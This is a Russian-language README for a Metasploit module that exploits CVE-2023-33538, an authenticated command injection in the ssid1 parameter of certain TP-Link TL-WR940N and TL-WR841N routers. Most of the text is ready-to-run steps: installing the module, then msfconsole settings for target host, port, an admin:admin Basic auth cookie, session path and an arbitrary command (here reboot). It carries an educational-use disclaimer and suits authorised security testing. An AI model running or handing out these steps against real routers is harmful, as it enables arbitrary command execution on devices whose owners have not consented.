
CVE-2023-33538 - Внедрение команд TP-Link Ruby-модуль для Metasploit Framework
Этот вспомогательный модуль Metasploit нацелен на аутентифицированную уязвимость внедрения команд в маршрутизаторах TP-Link TL-WR940N V2/V4 и TL-WR841N V8/V10.
Проблема заключается в уязвимом параметре ssid1, используемом в WlanNetworkRpm.htm, что позволяет внедрять произвольные команды оболочки.
При успешной эксплуатации атакующий может выполнять произвольные команды на устройстве.
Дополнительная информация о CVE:
https://nvd.nist.gov/vuln/detail/CVE-2023-33538
.rb файл в папку модулей Metasploit, например:cp tplink_ssid1_rce.rb/usr/share/metasploit-framework/modules/auxiliary/admin/http/
msfconsole
search tplink
use auxiliary/admin/http/tplink_ssid1_rce
set RHOSTS 192.168.0.1
set RPORT 80
set AUTHCOOKIE Basic%20YWRtaW46YWRtaW4%3D
set SESSIONPATH /ABCD1234/
set CMD reboot
run
Модуль не выполняет аутентификацию. Вы должны вручную извлечь cookie
Authorizationи префикс сессии из успешного входа в веб-интерфейс маршрутизатора.
Этот модуль предназначен только для образовательных целей.
Не используйте этот код против устройств или инфраструктуры, которые вам не принадлежат или на тестирование которых у вас нет явного разрешения.
Если вы нашли ошибки или у вас есть идеи по улучшению – не стесняйтесь открыть issue или оставить комментарий.